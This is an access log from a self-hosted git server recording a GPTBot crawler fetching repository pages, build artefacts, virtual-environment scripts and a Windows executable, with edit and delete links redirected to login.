"https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10035] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11283] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 1485] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10081] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:17:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:17:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:17:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:17:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 15363] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:17:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11917] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11916] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:10:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:17:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:17:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22050] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13506] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11533] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:17:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 12982] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22017] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11527] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11574] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:17:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11516] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11082] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13014] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11555] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11050] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19873] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 